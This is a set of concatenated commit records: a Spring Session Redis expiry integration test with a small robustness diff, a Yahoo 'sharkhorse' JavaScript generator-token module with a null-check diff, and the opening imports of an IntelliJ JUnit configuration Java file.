lock) { this.lock = lock; } } @Configuration @EnableRedisHttpSession(maxInactiveIntervalInSeconds = 1) static class Config { @Bean public JedisConnectionFactory connectionFactory() throws Exception { JedisConnectionFactory factory = new JedisConnectionFactory(); factory.setPort(getPort()); factory.setUsePool(false); return factory; } @Bean public static RedisServerBean redisServer() { return new RedisServerBean(); } @Bean public SessionDestroyedEventRegistry sessionDestroyedEventRegistry() { return new SessionDestroyedEventRegistry(); } /** * Implements BeanDefinitionRegistryPostProcessor to ensure this Bean * is initialized before any other Beans. Specifically, we want to ensure * that the Redis Server is started before RedisHttpSessionConfiguration * attempts to enable Keyspace notifications. */ static class RedisServerBean implements InitializingBean, DisposableBean, BeanDefinitionRegistryPostProcessor { private RedisServer redisServer; @Override public void afterPropertiesSet() throws Exception { redisServer = new RedisServer(getPort()); redisServer.start(); } @Override public void destroy() throws Exception { if(redisServer != null) { redisServer.stop(); } } @Override public void postProcessBeanDefinitionRegistry(BeanDefinitionRegistry registry) throws BeansException {} @Override public void postProcessBeanFactory(ConfigurableListableBeanFactory beanFactory) throws BeansException {} } } private static Integer availablePort; private static int getPort() throws IOException { if(availablePort == null) { ServerSocket socket = new ServerSocket(0); availablePort = socket.getLocalPort(); socket.close(); } return Protocol.DEFAULT_PORT; } }
spring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java
/* * Copyright 2002-2014 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package org.springframework.session.data.redis.config.annotation.web.http; import static org.fest.assertions.Assertions.assertThat; import java.io.IOException; import java.net.ServerSocket; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.BeansException; import org.springframework.beans.factory.DisposableBean; import org.springframework.beans.factory.InitializingBean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.config.ConfigurableListableBeanFactory; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.BeanDefinitionRegistryPostProcessor; import org.springframework.context.ApplicationListener; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.data.redis.connection.jedis.JedisConnectionFactory; import org.springframework.scheduling.annotation.EnableScheduling; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.authority.AuthorityUtils; import org.springframework.security.core.context.SecurityContext; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.session.Session; import org.springframework.session.SessionRepository; import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; import org.springframework.session.events.SessionDestroyedEvent; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; import redis.clients.jedis.Protocol; import redis.embedded.RedisServer; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends Session> { private RedisServer redisServer; @Autowired private SessionRepository<S> repository; @Autowired private SessionDestroyedEventRegistry registry; private final Object lock = new Object(); @Before public void setup() { registry.setLock(lock); } @Test public void expireFiresSessionDestroyedEvent() throws InterruptedException { S toSave = repository.createSession(); toSave.setAttribute("a", "b"); Authentication toSaveToken = new UsernamePasswordAuthenticationToken("user","password", AuthorityUtils.createAuthorityList("ROLE_USER")); SecurityContext toSaveContext = SecurityContextHolder.createEmptyContext(); toSaveContext.setAuthentication(toSaveToken); toSave.setAttribute("SPRING_SECURITY_CONTEXT", toSaveContext); repository.save(toSave); synchronized (lock) { lock.wait(1100); } if(!registry.receivedEvent()) { // Redis makes no guarantees on when an expired event will be fired // we can ensure it gets fired by trying to get the session repository.getSession(toSave.getId()); } assertThat(registry.receivedEvent()).isTrue(); } static class SessionDestroyedEventRegistry implements ApplicationListener<SessionDestroyedEvent> { private boolean receivedEvent; private Object lock; @Override public void onApplicationEvent(SessionDestroyedEvent event) { receivedEvent = true; synchronized (lock) { lock.notifyAll(); } } public boolean receivedEvent() { return receivedEvent; } public void setLock(Object lock) { this.lock = lock; } } @Configuration @EnableRedisHttpSession(maxInactiveIntervalInSeconds = 1) static class Config { @Bean public JedisConnectionFactory connectionFactory() throws Exception { JedisConnectionFactory factory = new JedisConnectionFactory(); factory.setPort(getPort()); factory.setUsePool(false); return factory; } @Bean public static RedisServerBean redisServer() { return new RedisServerBean(); } @Bean public SessionDestroyedEventRegistry sessionDestroyedEventRegistry() { return new SessionDestroyedEventRegistry(); } /** * Implements BeanDefinitionRegistryPostProcessor to ensure this Bean * is initialized before any other Beans. Specifically, we want to ensure * that the Redis Server is started before RedisHttpSessionConfiguration * attempts to enable Keyspace notifications. */ static class RedisServerBean implements InitializingBean, DisposableBean, BeanDefinitionRegistryPostProcessor { private RedisServer redisServer; @Override public void afterPropertiesSet() throws Exception { redisServer = new RedisServer(getPort()); redisServer.start(); } @Override public void destroy() throws Exception { if(redisServer != null) { redisServer.stop(); } } @Override public void postProcessBeanDefinitionRegistry(BeanDefinitionRegistry registry) throws BeansException {} @Override public void postProcessBeanFactory(ConfigurableListableBeanFactory beanFactory) throws BeansException {} } } private static Integer availablePort; private static int getPort() throws IOException { if(availablePort == null) { ServerSocket socket = new ServerSocket(0); availablePort = socket.getLocalPort(); socket.close(); } return Protocol.DEFAULT_PORT; } }
Polish EnableRedisHttpSessionExpireSessionDestroyedTests
spring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java
Polish EnableRedisHttpSessionExpireSessionDestroyedTests
<ide><path>pring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java <ide> import org.springframework.security.core.authority.AuthorityUtils; <ide> import org.springframework.security.core.context.SecurityContext; <ide> import org.springframework.security.core.context.SecurityContextHolder; <add>import org.springframework.session.ExpiringSession; <ide> import org.springframework.session.Session; <ide> import org.springframework.session.SessionRepository; <ide> import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; <ide> <ide> @RunWith(SpringJUnit4ClassRunner.class) <ide> @ContextConfiguration <del>public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends Session> { <add>public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends ExpiringSession> { <ide> private RedisServer redisServer; <ide> <ide> @Autowired <ide> repository.save(toSave); <ide> <ide> synchronized (lock) { <del> lock.wait(1100); <add> lock.wait((toSave.getMaxInactiveIntervalInSeconds() * 1000) + 1); <ide> } <ide> if(!registry.receivedEvent()) { <ide> // Redis makes no guarantees on when an expired event will be fired <ide> // we can ensure it gets fired by trying to get the session <ide> repository.getSession(toSave.getId()); <add> synchronized (lock) { <add> if(!registry.receivedEvent()) { <add> // wait at most second to process the event <add> lock.wait(1000); <add> } <add> } <ide> } <ide> assertThat(registry.receivedEvent()).isTrue(); <ide> } <ide> <ide> @Override <ide> public void onApplicationEvent(SessionDestroyedEvent event) { <del> receivedEvent = true; <ide> synchronized (lock) { <add> receivedEvent = true; <ide> lock.notifyAll(); <ide> } <ide> }
JavaScript
bsd-3-clause
c14b3dfc2d3a93377ba0f3ab15a2f2c3296e6693
0
dmitriiabramov/sharkhorse
/* * Copyright 2015, Yahoo Inc. * Copyrights licensed under the New BSD License. * See the accompanying LICENSE file for terms. */ /** * That module marks generator functions as generators by assigning a specific uuid value to a specific property name. * Later, when evaluating the factory, we can identify a generator function by its token. * similar to `instanceof` but for functions */ const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7' const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken'; import invariant from './invariant'; export function markAsGenerator(fn) { invariant(fn, 'fn argument is required'); fn[TOKEN_PROP_NAME] = IDENTIFIER; } export function isGenerator(obj) { if (!obj) { return false; } return obj[TOKEN_PROP_NAME] === IDENTIFIER; }
src/generator_token.js
/* * Copyright 2015, Yahoo Inc. * Copyrights licensed under the New BSD License. * See the accompanying LICENSE file for terms. */ /** * That module marks generator functions as generators by assigning a specific uuid value to a specific property name. * Later, when evaluating the factory, we can identify a generator function by its token. * similar to `instanceof` but for functions */ const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7' const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken'; export function markAsGenerator(fn) { fn[TOKEN_PROP_NAME] = IDENTIFIER; } export function isGenerator(obj) { return obj[TOKEN_PROP_NAME] === IDENTIFIER; }
not generator for falsy values
src/generator_token.js
not generator for falsy values
<ide><path>rc/generator_token.js <ide> <ide> const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7' <ide> const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken'; <add>import invariant from './invariant'; <ide> <ide> export function markAsGenerator(fn) { <add> invariant(fn, 'fn argument is required'); <ide> fn[TOKEN_PROP_NAME] = IDENTIFIER; <ide> } <ide> <ide> export function isGenerator(obj) { <add> if (!obj) { <add> return false; <add> } <add> <ide> return obj[TOKEN_PROP_NAME] === IDENTIFIER; <ide> }
Java
apache-2.0
be546b629944ff9ecd5582494cefa84027f3af64
0
TangHao1987/intellij-community,michaelgallacher/intellij-community,tmpgit/intellij-community,fengbaicanhe/intellij-community,pwoodworth/intellij-community,petteyg/intellij-community,da1z/intellij-community,supersven/intellij-community,vvv1559/intellij-community,kdwink/intellij-community,slisson/intellij-community,kdwink/intellij-community,supersven/intellij-community,orekyuu/intellij-community,ol-loginov/intellij-community,alphafoobar/intellij-community,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,holmes/intellij-community,apixandru/intellij-community,gnuhub/intellij-community,vladmm/intellij-community,jagguli/intellij-community,fengbaicanhe/intellij-community,da1z/intellij-community,gnuhub/intellij-community,salguarnieri/intellij-community,adedayo/intellij-community,petteyg/intellij-community,slisson/intellij-community,MichaelNedzelsky/intellij-community,gnuhub/intellij-community,muntasirsyed/intellij-community,samthor/intellij-community,kool79/intellij-community,Distrotech/intellij-community,vladmm/intellij-community,nicolargo/intellij-community,clumsy/intellij-community,asedunov/intellij-community,MichaelNedzelsky/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,SerCeMan/intellij-community,hurricup/intellij-community,salguarnieri/intellij-community,clumsy/intellij-community,holmes/intellij-community,blademainer/intellij-community,robovm/robovm-studio,fnouama/intellij-community,orekyuu/intellij-community,xfournet/intellij-community,gnuhub/intellij-community,blademainer/intellij-community,da1z/intellij-community,caot/intellij-community,ivan-fedorov/intellij-community,ThiagoGarciaAlves/intellij-community,MER-GROUP/intellij-community,pwoodworth/intellij-community,ibinti/intellij-community,clumsy/intellij-community,signed/intellij-community,ibinti/intellij-community,ol-loginov/intellij-community,nicolargo/intellij-community,TangHao1987/intellij-community,ahb0327/intellij-community,nicolargo/intellij-community,gnuhub/intellij-community,ahb0327/intellij-community,suncycheng/intellij-community,ahb0327/intellij-community,gnuhub/intellij-community,caot/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,ftomassetti/intellij-community,idea4bsd/idea4bsd,wreckJ/intellij-community,diorcety/intellij-community,retomerz/intellij-community,ftomassetti/intellij-community,suncycheng/intellij-community,mglukhikh/intellij-community,ftomassetti/intellij-community,FHannes/intellij-community,vladmm/intellij-community,muntasirsyed/intellij-community,MER-GROUP/intellij-community,izonder/intellij-community,semonte/intellij-community,clumsy/intellij-community,muntasirsyed/intellij-community,ThiagoGarciaAlves/intellij-community,blademainer/intellij-community,MichaelNedzelsky/intellij-community,kdwink/intellij-community,fitermay/intellij-community,ryano144/intellij-community,SerCeMan/intellij-community,clumsy/intellij-community,holmes/intellij-community,slisson/intellij-community,retomerz/intellij-community,alphafoobar/intellij-community,retomerz/intellij-community,samthor/intellij-community,fengbaicanhe/intellij-community,FHannes/intellij-community,SerCeMan/intellij-community,Distrotech/intellij-community,clumsy/intellij-community,FHannes/intellij-community,diorcety/intellij-community,vladmm/intellij-community,tmpgit/intellij-community,akosyakov/intellij-community,apixandru/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,salguarnieri/intellij-community,muntasirsyed/intellij-community,dslomov/intellij-community,ThiagoGarciaAlves/intellij-community,dslomov/intellij-community,dslomov/intellij-community,ivan-fedorov/intellij-community,ibinti/intellij-community,blademainer/intellij-community,gnuhub/intellij-community,ftomassetti/intellij-community,TangHao1987/intellij-community,FHannes/intellij-community,ftomassetti/intellij-community,fnouama/intellij-community,nicolargo/intellij-community,apixandru/intellij-community,supersven/intellij-community,petteyg/intellij-community,vvv1559/intellij-community,retomerz/intellij-community,hurricup/intellij-community,MichaelNedzelsky/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,apixandru/intellij-community,adedayo/intellij-community,lucafavatella/intellij-community,ryano144/intellij-community,clumsy/intellij-community,izonder/intellij-community,semonte/intellij-community,supersven/intellij-community,dslomov/intellij-community,ol-loginov/intellij-community,fnouama/intellij-community,ivan-fedorov/intellij-community,signed/intellij-community,jagguli/intellij-community,fnouama/intellij-community,pwoodworth/intellij-community,hurricup/intellij-community,pwoodworth/intellij-community,xfournet/intellij-community,xfournet/intellij-community,supersven/intellij-community,youdonghai/intellij-community,jagguli/intellij-community,orekyuu/intellij-community,hurricup/intellij-community,mglukhikh/intellij-community,asedunov/intellij-community,TangHao1987/intellij-community,diorcety/intellij-community,allotria/intellij-community,akosyakov/intellij-community,asedunov/intellij-community,signed/intellij-community,jagguli/intellij-community,idea4bsd/idea4bsd,michaelgallacher/intellij-community,ibinti/intellij-community,lucafavatella/intellij-community,lucafavatella/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,ol-loginov/intellij-community,signed/intellij-community,kool79/intellij-community,fnouama/intellij-community,amith01994/intellij-community,signed/intellij-community,semonte/intellij-community,gnuhub/intellij-community,FHannes/intellij-community,blademainer/intellij-community,hurricup/intellij-community,pwoodworth/intellij-community,youdonghai/intellij-community,ol-loginov/intellij-community,samthor/intellij-community,youdonghai/intellij-community,salguarnieri/intellij-community,vladmm/intellij-community,orekyuu/intellij-community,signed/intellij-community,kool79/intellij-community,ivan-fedorov/intellij-community,mglukhikh/intellij-community,holmes/intellij-community,ThiagoGarciaAlves/intellij-community,kdwink/intellij-community,robovm/robovm-studio,fnouama/intellij-community,kool79/intellij-community,supersven/intellij-community,amith01994/intellij-community,nicolargo/intellij-community,blademainer/intellij-community,retomerz/intellij-community,blademainer/intellij-community,holmes/intellij-community,youdonghai/intellij-community,jagguli/intellij-community,ibinti/intellij-community,apixandru/intellij-community,ibinti/intellij-community,allotria/intellij-community,allotria/intellij-community,TangHao1987/intellij-community,diorcety/intellij-community,asedunov/intellij-community,wreckJ/intellij-community,wreckJ/intellij-community,samthor/intellij-community,alphafoobar/intellij-community,idea4bsd/idea4bsd,holmes/intellij-community,amith01994/intellij-community,amith01994/intellij-community,MER-GROUP/intellij-community,hurricup/intellij-community,nicolargo/intellij-community,salguarnieri/intellij-community,holmes/intellij-community,muntasirsyed/intellij-community,lucafavatella/intellij-community,slisson/intellij-community,michaelgallacher/intellij-community,semonte/intellij-community,ivan-fedorov/intellij-community,ryano144/intellij-community,Lekanich/intellij-community,lucafavatella/intellij-community,allotria/intellij-community,lucafavatella/intellij-community,alphafoobar/intellij-community,caot/intellij-community,kool79/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,akosyakov/intellij-community,FHannes/intellij-community,ftomassetti/intellij-community,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,samthor/intellij-community,kdwink/intellij-community,hurricup/intellij-community,orekyuu/intellij-community,fitermay/intellij-community,allotria/intellij-community,pwoodworth/intellij-community,tmpgit/intellij-community,suncycheng/intellij-community,SerCeMan/intellij-community,michaelgallacher/intellij-community,SerCeMan/intellij-community,xfournet/intellij-community,tmpgit/intellij-community,fitermay/intellij-community,wreckJ/intellij-community,fengbaicanhe/intellij-community,MichaelNedzelsky/intellij-community,samthor/intellij-community,fitermay/intellij-community,diorcety/intellij-community,kool79/intellij-community,robovm/robovm-studio,dslomov/intellij-community,MER-GROUP/intellij-community,Distrotech/intellij-community,mglukhikh/intellij-community,fnouama/intellij-community,ryano144/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,adedayo/intellij-community,mglukhikh/intellij-community,mglukhikh/intellij-community,slisson/intellij-community,adedayo/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,da1z/intellij-community,youdonghai/intellij-community,Distrotech/intellij-community,ryano144/intellij-community,jagguli/intellij-community,semonte/intellij-community,michaelgallacher/intellij-community,ahb0327/intellij-community,robovm/robovm-studio,retomerz/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,Lekanich/intellij-community,samthor/intellij-community,amith01994/intellij-community,caot/intellij-community,salguarnieri/intellij-community,izonder/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,ThiagoGarciaAlves/intellij-community,pwoodworth/intellij-community,Lekanich/intellij-community,apixandru/intellij-community,tmpgit/intellij-community,Distrotech/intellij-community,slisson/intellij-community,ol-loginov/intellij-community,SerCeMan/intellij-community,wreckJ/intellij-community,alphafoobar/intellij-community,fnouama/intellij-community,idea4bsd/idea4bsd,ivan-fedorov/intellij-community,Lekanich/intellij-community,michaelgallacher/intellij-community,apixandru/intellij-community,ftomassetti/intellij-community,tmpgit/intellij-community,hurricup/intellij-community,allotria/intellij-community,MER-GROUP/intellij-community,jagguli/intellij-community,fnouama/intellij-community,da1z/intellij-community,dslomov/intellij-community,gnuhub/intellij-community,dslomov/intellij-community,holmes/intellij-community,hurricup/intellij-community,tmpgit/intellij-community,salguarnieri/intellij-community,asedunov/intellij-community,holmes/intellij-community,petteyg/intellij-community,petteyg/intellij-community,Distrotech/intellij-community,nicolargo/intellij-community,muntasirsyed/intellij-community,signed/intellij-community,da1z/intellij-community,TangHao1987/intellij-community,vladmm/intellij-community,orekyuu/intellij-community,samthor/intellij-community,ftomassetti/intellij-community,fitermay/intellij-community,orekyuu/intellij-community,izonder/intellij-community,signed/intellij-community,supersven/intellij-community,asedunov/intellij-community,ol-loginov/intellij-community,kool79/intellij-community,supersven/intellij-community,salguarnieri/intellij-community,xfournet/intellij-community,alphafoobar/intellij-community,ryano144/intellij-community,diorcety/intellij-community,akosyakov/intellij-community,holmes/intellij-community,tmpgit/intellij-community,supersven/intellij-community,blademainer/intellij-community,jagguli/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,xfournet/intellij-community,allotria/intellij-community,petteyg/intellij-community,diorcety/intellij-community,suncycheng/intellij-community,wreckJ/intellij-community,dslomov/intellij-community,Lekanich/intellij-community,tmpgit/intellij-community,lucafavatella/intellij-community,Lekanich/intellij-community,idea4bsd/idea4bsd,MichaelNedzelsky/intellij-community,Lekanich/intellij-community,adedayo/intellij-community,michaelgallacher/intellij-community,idea4bsd/idea4bsd,supersven/intellij-community,fengbaicanhe/intellij-community,fitermay/intellij-community,Distrotech/intellij-community,caot/intellij-community,slisson/intellij-community,semonte/intellij-community,caot/intellij-community,youdonghai/intellij-community,samthor/intellij-community,asedunov/intellij-community,pwoodworth/intellij-community,asedunov/intellij-community,ahb0327/intellij-community,ryano144/intellij-community,asedunov/intellij-community,vvv1559/intellij-community,retomerz/intellij-community,mglukhikh/intellij-community,lucafavatella/intellij-community,fitermay/intellij-community,apixandru/intellij-community,diorcety/intellij-community,muntasirsyed/intellij-community,robovm/robovm-studio,kool79/intellij-community,salguarnieri/intellij-community,holmes/intellij-community,ftomassetti/intellij-community,ryano144/intellij-community,apixandru/intellij-community,ThiagoGarciaAlves/intellij-community,vladmm/intellij-community,kool79/intellij-community,akosyakov/intellij-community,MichaelNedzelsky/intellij-community,pwoodworth/intellij-community,michaelgallacher/intellij-community,adedayo/intellij-community,asedunov/intellij-community,apixandru/intellij-community,ol-loginov/intellij-community,supersven/intellij-community,ivan-fedorov/intellij-community,allotria/intellij-community,jagguli/intellij-community,vvv1559/intellij-community,izonder/intellij-community,semonte/intellij-community,allotria/intellij-community,allotria/intellij-community,kdwink/intellij-community,salguarnieri/intellij-community,ryano144/intellij-community,semonte/intellij-community,ftomassetti/intellij-community,FHannes/intellij-community,ivan-fedorov/intellij-community,petteyg/intellij-community,vvv1559/intellij-community,adedayo/intellij-community,jagguli/intellij-community,ftomassetti/intellij-community,lucafavatella/intellij-community,SerCeMan/intellij-community,vvv1559/intellij-community,muntasirsyed/intellij-community,Lekanich/intellij-community,fitermay/intellij-community,fitermay/intellij-community,kdwink/intellij-community,muntasirsyed/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,slisson/intellij-community,nicolargo/intellij-community,muntasirsyed/intellij-community,kool79/intellij-community,slisson/intellij-community,salguarnieri/intellij-community,amith01994/intellij-community,FHannes/intellij-community,izonder/intellij-community,wreckJ/intellij-community,blademainer/intellij-community,michaelgallacher/intellij-community,idea4bsd/idea4bsd,akosyakov/intellij-community,izonder/intellij-community,xfournet/intellij-community,youdonghai/intellij-community,suncycheng/intellij-community,wreckJ/intellij-community,da1z/intellij-community,ol-loginov/intellij-community,MichaelNedzelsky/intellij-community,MichaelNedzelsky/intellij-community,MichaelNedzelsky/intellij-community,retomerz/intellij-community,caot/intellij-community,amith01994/intellij-community,lucafavatella/intellij-community,vladmm/intellij-community,pwoodworth/intellij-community,tmpgit/intellij-community,fitermay/intellij-community,adedayo/intellij-community,ahb0327/intellij-community,hurricup/intellij-community,gnuhub/intellij-community,signed/intellij-community,retomerz/intellij-community,vvv1559/intellij-community,michaelgallacher/intellij-community,hurricup/intellij-community,robovm/robovm-studio,diorcety/intellij-community,alphafoobar/intellij-community,TangHao1987/intellij-community,ftomassetti/intellij-community,apixandru/intellij-community,Distrotech/intellij-community,adedayo/intellij-community,dslomov/intellij-community,ibinti/intellij-community,nicolargo/intellij-community,dslomov/intellij-community,amith01994/intellij-community,vvv1559/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,kool79/intellij-community,caot/intellij-community,da1z/intellij-community,fengbaicanhe/intellij-community,Distrotech/intellij-community,fnouama/intellij-community,ibinti/intellij-community,ahb0327/intellij-community,TangHao1987/intellij-community,nicolargo/intellij-community,suncycheng/intellij-community,vvv1559/intellij-community,akosyakov/intellij-community,izonder/intellij-community,diorcety/intellij-community,jagguli/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,caot/intellij-community,xfournet/intellij-community,ivan-fedorov/intellij-community,fitermay/intellij-community,clumsy/intellij-community,SerCeMan/intellij-community,idea4bsd/idea4bsd,da1z/intellij-community,hurricup/intellij-community,akosyakov/intellij-community,tmpgit/intellij-community,samthor/intellij-community,mglukhikh/intellij-community,robovm/robovm-studio,gnuhub/intellij-community,michaelgallacher/intellij-community,ahb0327/intellij-community,allotria/intellij-community,vladmm/intellij-community,ibinti/intellij-community,izonder/intellij-community,alphafoobar/intellij-community,adedayo/intellij-community,kdwink/intellij-community,alphafoobar/intellij-community,orekyuu/intellij-community,diorcety/intellij-community,semonte/intellij-community,Distrotech/intellij-community,ahb0327/intellij-community,izonder/intellij-community,adedayo/intellij-community,wreckJ/intellij-community,petteyg/intellij-community,mglukhikh/intellij-community,semonte/intellij-community,Distrotech/intellij-community,FHannes/intellij-community,fnouama/intellij-community,idea4bsd/idea4bsd,fengbaicanhe/intellij-community,ivan-fedorov/intellij-community,ol-loginov/intellij-community,ibinti/intellij-community,Lekanich/intellij-community,ahb0327/intellij-community,adedayo/intellij-community,semonte/intellij-community,fengbaicanhe/intellij-community,mglukhikh/intellij-community,orekyuu/intellij-community,ibinti/intellij-community,lucafavatella/intellij-community,dslomov/intellij-community,vvv1559/intellij-community,fengbaicanhe/intellij-community,da1z/intellij-community,vladmm/intellij-community,clumsy/intellij-community,robovm/robovm-studio,petteyg/intellij-community,lucafavatella/intellij-community,akosyakov/intellij-community,lucafavatella/intellij-community,amith01994/intellij-community,vladmm/intellij-community,alphafoobar/intellij-community,asedunov/intellij-community,clumsy/intellij-community,akosyakov/intellij-community,apixandru/intellij-community,TangHao1987/intellij-community,muntasirsyed/intellij-community,MichaelNedzelsky/intellij-community,salguarnieri/intellij-community,ahb0327/intellij-community,nicolargo/intellij-community,FHannes/intellij-community,wreckJ/intellij-community,Lekanich/intellij-community,amith01994/intellij-community,TangHao1987/intellij-community,blademainer/intellij-community,asedunov/intellij-community,xfournet/intellij-community,MER-GROUP/intellij-community,caot/intellij-community,robovm/robovm-studio,fengbaicanhe/intellij-community,fitermay/intellij-community,SerCeMan/intellij-community,amith01994/intellij-community,gnuhub/intellij-community,signed/intellij-community,Lekanich/intellij-community,hurricup/intellij-community,da1z/intellij-community,akosyakov/intellij-community,suncycheng/intellij-community,retomerz/intellij-community,ryano144/intellij-community,da1z/intellij-community,caot/intellij-community,SerCeMan/intellij-community,SerCeMan/intellij-community,slisson/intellij-community,fitermay/intellij-community,nicolargo/intellij-community,ol-loginov/intellij-community,diorcety/intellij-community,akosyakov/intellij-community,ivan-fedorov/intellij-community,ryano144/intellij-community,da1z/intellij-community,amith01994/intellij-community,caot/intellij-community,orekyuu/intellij-community,signed/intellij-community,blademainer/intellij-community,petteyg/intellij-community,MER-GROUP/intellij-community,apixandru/intellij-community,wreckJ/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,blademainer/intellij-community,fnouama/intellij-community,izonder/intellij-community,MER-GROUP/intellij-community,ryano144/intellij-community,alphafoobar/intellij-community,retomerz/intellij-community,orekyuu/intellij-community,pwoodworth/intellij-community,xfournet/intellij-community,apixandru/intellij-community,ivan-fedorov/intellij-community,wreckJ/intellij-community,youdonghai/intellij-community,youdonghai/intellij-community,Distrotech/intellij-community,retomerz/intellij-community,robovm/robovm-studio,kool79/intellij-community,ahb0327/intellij-community,MER-GROUP/intellij-community,ol-loginov/intellij-community,retomerz/intellij-community,tmpgit/intellij-community,petteyg/intellij-community,fengbaicanhe/intellij-community,samthor/intellij-community,robovm/robovm-studio,ThiagoGarciaAlves/intellij-community,asedunov/intellij-community,pwoodworth/intellij-community,MichaelNedzelsky/intellij-community,slisson/intellij-community,clumsy/intellij-community,samthor/intellij-community,michaelgallacher/intellij-community,FHannes/intellij-community,izonder/intellij-community,orekyuu/intellij-community,vladmm/intellij-community,semonte/intellij-community,holmes/intellij-community,slisson/intellij-community,jagguli/intellij-community,alphafoobar/intellij-community,mglukhikh/intellij-community,kdwink/intellij-community,FHannes/intellij-community,robovm/robovm-studio,fengbaicanhe/intellij-community,dslomov/intellij-community,ibinti/intellij-community,Lekanich/intellij-community,FHannes/intellij-community,signed/intellij-community,SerCeMan/intellij-community,suncycheng/intellij-community,supersven/intellij-community,clumsy/intellij-community,petteyg/intellij-community,allotria/intellij-community,muntasirsyed/intellij-community,TangHao1987/intellij-community,TangHao1987/intellij-community
/* * Copyright 2000-2011 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.execution.junit; import com.intellij.ExtensionPoints; import com.intellij.execution.*; import com.intellij.execution.configurations.*; import com.intellij.execution.junit2.TestProxy; import com.intellij.execution.junit2.segments.DeferredActionsQueue; import com.intellij.execution.junit2.segments.DeferredActionsQueueImpl; import com.intellij.execution.junit2.segments.DispatchListener; import com.intellij.execution.junit2.segments.Extractor; import com.intellij.execution.junit2.ui.JUnitTreeConsoleView; import com.intellij.execution.junit2.ui.TestsPacketsReceiver; import com.intellij.execution.junit2.ui.actions.RerunFailedTestsAction; import com.intellij.execution.junit2.ui.model.CompletionEvent; import com.intellij.execution.junit2.ui.model.JUnitRunningModel; import com.intellij.execution.junit2.ui.model.RootTestInfo; import com.intellij.execution.junit2.ui.properties.JUnitConsoleProperties; import com.intellij.execution.process.ProcessAdapter; import com.intellij.execution.process.ProcessEvent; import com.intellij.execution.runners.ExecutionEnvironment; import com.intellij.execution.runners.ProgramRunner; import com.intellij.execution.testframework.*; import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil; import com.intellij.execution.testframework.sm.runner.SMTRunnerConsoleProperties; import com.intellij.execution.testframework.sm.runner.ui.SMTRunnerConsoleView; import com.intellij.execution.testframework.ui.BaseTestsOutputConsoleView; import com.intellij.execution.ui.ConsoleView; import com.intellij.execution.ui.ConsoleViewContentType; import com.intellij.execution.util.JavaParametersUtil; import com.intellij.execution.util.ProgramParametersUtil; import com.intellij.openapi.Disposable; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.extensions.Extensions; import com.intellij.openapi.module.Module; import com.intellij.openapi.module.ModuleUtilCore; import com.intellij.openapi.project.Project; import com.intellij.openapi.projectRoots.JavaSdkType; import com.intellij.openapi.projectRoots.Sdk; import com.intellij.openapi.projectRoots.ex.JavaSdkUtil; import com.intellij.openapi.roots.ModuleRootManager; import com.intellij.openapi.roots.ProjectRootManager; import com.intellij.openapi.util.Comparing; import com.intellij.openapi.util.Disposer; import com.intellij.openapi.util.Getter; import com.intellij.openapi.util.Key; import com.intellij.openapi.util.io.FileUtil; import com.intellij.openapi.util.registry.Registry; import com.intellij.openapi.vfs.CharsetToolkit; import com.intellij.psi.PsiClass; import com.intellij.psi.PsiElement; import com.intellij.psi.PsiMethod; import com.intellij.psi.PsiPackage; import 